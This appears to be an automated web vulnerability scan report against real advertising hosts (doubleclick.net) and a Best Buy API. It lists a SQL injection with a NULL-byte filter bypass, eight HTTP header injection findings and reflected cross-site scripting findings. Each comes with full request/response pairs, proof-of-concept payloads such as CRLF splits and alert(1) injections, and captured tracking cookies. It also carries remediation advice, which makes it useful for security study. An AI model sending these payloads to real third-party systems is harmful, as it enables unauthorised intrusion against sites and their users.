GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1''&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:52:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 13835
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.5. http://googleads.g.doubleclick.net/pagead/ads [xpc parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The xpc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the xpc parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311007931&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311007931690&bpp=2&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264&correlator=1311007922811&frm=4&adk=2516592769&ga_vid=1596259680.1311007547&ga_sid=1311007923&ga_hid=373783176&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&biw=1331&bih=853&eid=33895298&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=3&dtd=34&xpc=6HsRezTlah%00'&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 17:14:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 11893
X-XSS-Protection: 1; mode=block
Expires: Mon, 18 Jul 2011 17:14:26 GMT

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
GGh0dHA6Ly9sb29rdXBzZXJ2ZXIuY29tL-ABA4ACAagDAcgDF-gDNegD9gjoA6MF9QMAAADA&num=1&sig=AOD64_3ZVj_Lo-t-cb9KnSQYChR7EafSNQ&client=ca-pub-6114143813287942&adurl=http://info.arcsight.com/content/Google-FixThyErrors%3F_kk%3Dweb%2520server%2520log%2520analysis%26_kt%3D8974c719-c103-4db7-9bcc-7279bc4ac8fc" id=aw0 onclick="ha('aw0')" onfocus="ss('','aw0')" onmousedown="st('aw0')" onmouseover="return ss('','aw0')" t
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311007931&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311007931690&bpp=2&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264&correlator=1311007922811&frm=4&adk=2516592769&ga_vid=1596259680.1311007547&ga_sid=1311007923&ga_hid=373783176&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&biw=1331&bih=853&eid=33895298&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=3&dtd=34&xpc=6HsRezTlah%00''&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 17:14:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 3512
X-XSS-Protection: 1; mode=block
Expires: Mon, 18 Jul 2011 17:14:28 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

2. HTTP header injection  previous  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.tribalfusion/B2343920.21

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9a938%0d%0ac3e2240532d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9a938%0d%0ac3e2240532d/N3285.tribalfusion/B2343920.21;sz=160x600;click=http://a.tribalfusion.com/h.click/aDmNBGUAnTQq3XQsnnQWUy0dZbtWmQM4sJWYrQIVmqv56n9PmMG3dro0d3IpdZau46rS5sj8Tsv6Wsj8S6ryWW3UUr725bTtUqQvWaQlQEBZbRG3ZaRrImRd7bUGMQ2FurnWanYTew2dnHPcjH46JFmtIpUH760UU6YrY9VWeGjrZcqXA/;ord=475813307? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9a938
c3e2240532d
/N3285.tribalfusion/B2343920.21;sz=160x600;click=http: //a.tribalfusion.com/h.click/aDmNBGUAnTQq3XQsnnQWUy0dZbtWmQM4sJWYrQIVmqv56n9PmMG3dro0d3IpdZau46rS5sj8Tsv6Wsj8S6ryWW3UUr725bTtUqQvWaQlQEBZbRG3ZaRrImRd7bUGMQ2FurnWanYTew2dnHPcjH46JFmtIpUH760UU6YrY9VWeGjrZcqXA/;ord=475813307
Date: Mon, 18 Jul 2011 19:13:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5426163.28

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7345b%0d%0ad9736aeb174 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7345b%0d%0ad9736aeb174/N5823.152304.TRADEDESK/B5426163.28;sz=160x600;ord=3131077211711159573?;click=http://r.turn.com/r/formclick/id/FT1diCLScyvYjQ4AZQABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7345b
d9736aeb174
/N5823.152304.TRADEDESK/B5426163.28;sz=160x600;ord=3131077211711159573:
Date: Mon, 18 Jul 2011 19:13:45 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5426163.29

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9e6a0%0d%0affebc99fc8b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9e6a0%0d%0affebc99fc8b/N5823.152304.TRADEDESK/B5426163.29;sz=300x250;ord=8799339868473587130?;click=http://r.turn.com/r/formclick/id/uvVMTv2IHXrZFQcAcQABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9e6a0
ffebc99fc8b
/N5823.152304.TRADEDESK/B5426163.29;sz=300x250;ord=8799339868473587130:
Date: Mon, 18 Jul 2011 19:18:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.18 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9fd24%0d%0a168799bb10 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9fd24%0d%0a168799bb10/N3175.272756.AOL-ADVERTISING2/B4640114.18;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001028093/cstr=90758083=_4e24869e,3321855143,783329%5E1028093%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=90758083/optn=64?trg=;ord=3321855143? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9fd24
168799bb10
/N3175.272756.AOL-ADVERTISING2/B4640114.18;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001028093/cstr=90758083=_4e24869e,3321855143,783329^1028093^1183^0,1_/xsxdata=$xsxdata/bnum=90758083/optn=64
Date: Mon, 18 Jul 2011 19:18:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adj/N553.AEAOLService/B4970757.33 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.AEAOLService/B4970757.33

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5136d%0d%0a4ca7202ff2d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5136d%0d%0a4ca7202ff2d/N553.AEAOLService/B4970757.33;sz=300x250;pc=%5BTPAS_ID%5D;click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001034010/cstr=19608333=_4e2486a2,6057331701,783329%5E1034010%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=19608333/optn=64?trg=;ord=6057331701? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5136d
4ca7202ff2d
/N553.AEAOLService/B4970757.33;sz=300x250;pc=[TPAS_ID];click=http: //r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001034010/cstr=19608333=_4e2486a2,6057331701,783329^1034010^1183^0,1_/xsxdata=$xsxdata/bnum=19608333/optn=64
Date: Mon, 18 Jul 2011 19:18:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5621931.6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5823.152304.TRADEDESK/B5621931.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8727a%0d%0abf5d0ba888 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8727a%0d%0abf5d0ba888/N5823.152304.TRADEDESK/B5621931.6;sz=160x600;ord=4302430671862709008?;click=http://r.turn.com/r/formclick/id/EDsfm-ZNtTvIqQgAcgABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8727a
bf5d0ba888
/N5823.152304.TRADEDESK/B5621931.6;sz=160x600;ord=4302430671862709008:
Date: Mon, 18 Jul 2011 19:18:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adj/cm.bby.pcmcat203600050025/pcmcat203600050025 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.bby.pcmcat203600050025/pcmcat203600050025

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78e59%0d%0a406ba78a9fd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /78e59%0d%0a406ba78a9fd/cm.bby.pcmcat203600050025/pcmcat203600050025;dcopt=ist;id=pcmcat203600050025;type=list;brand=;sku=;subzone1=undefined;subzone2=undefined;subzone3=undefined;subzone4=undefined;pos=top;tile=1;sz=728x90;ord=2881598161? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://images.bestbuy.com/BestBuy_US/en_US/images/global/admodel/fire.html?size=728x90&site=pcmcat203600050025&zone=pcmcat203600050025&id=pcmcat203600050025&type=list&subzone1=undefined&subzone1=undefined&subzone3=undefined&subzone4=undefined&tile=1
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78e59
406ba78a9fd
/cm.bby.pcmcat203600050025/pcmcat203600050025;dcopt=ist;id=pcmcat203600050025;type=list;brand=;sku=;subzone1=undefined;subzone2=undefined;subzone3=undefined;subzone4=undefined;pos=top;tile=1;sz=728x90;ord=2881598161:
Date: Mon, 18 Jul 2011 12:59:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13222%0d%0a21d5724794f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13222%0d%0a21d5724794f/cm.ver.adhd_search/slideshow/womensymptoms;ugc=n;c=slideshow;i=c5822;dcopt=ist;comp=;tile=1;sz=728x90;vp=a;search=n;ord=240008804? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13222
21d5724794f
/cm.ver.adhd_search/slideshow/womensymptoms;ugc=n;c=slideshow;i=c5822;dcopt=ist;comp=;tile=1;sz=728x90;vp=a;search=n;ord=240008804:
Date: Mon, 18 Jul 2011 19:23:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)  previous  next
There are 181 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [hcpage2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of the hcpage2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8263a'%3balert(1)//e7aed1d2a92 was submitted in the hcpage2 parameter. This input was echoed as 8263a';alert(1)//e7aed1d2a92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ver.adhd_search/slideshow/womensymptoms;hcpage2=8263a'%3balert(1)//e7aed1d2a92 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 424
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 18 Jul 2011 19:24:06 GMT
Expires: Mon, 18 Jul 2011 19:24:06 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b48/0/0/%2a/o;231426503;0-0;0;65456586;3454-728/90;43051775/43069562/1;;~okv=;hcpage2=8263a';alert(1)//e7aed1d2a92;~aopt=2/0/ff/0;~sscs=%3fhttp://www.communityinvitations.com/html.pro?ID=1026&said=mc123&csid=hc11&pcid=HC">
...[SNIP]...

3.2. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [ugc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of the ugc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d5c6'%3balert(1)//015365853bb was submitted in the ugc parameter. This input was echoed as 7d5c6';alert(1)//015365853bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ver.adhd_search/slideshow/womensymptoms;ugc=7d5c6'%3balert(1)//015365853bb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 420
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 18 Jul 2011 19:23:37 GMT
Expires: Mon, 18 Jul 2011 19:23:37 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b48/0/0/%2a/o;231426503;0-0;0;65456586;3454-728/90;43051775/43069562/1;;~okv=;ugc=7d5c6';alert(1)//015365853bb;~aopt=2/0/ff/0;~sscs=%3fhttp://www.communityinvitations.com/html.pro?ID=1026&said=mc123&csid=hc11&pcid=HC">
...[SNIP]...

3.3. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68799<script>alert(1)</script>a288158a184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v168799<script>alert(1)</script>a288158a184/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
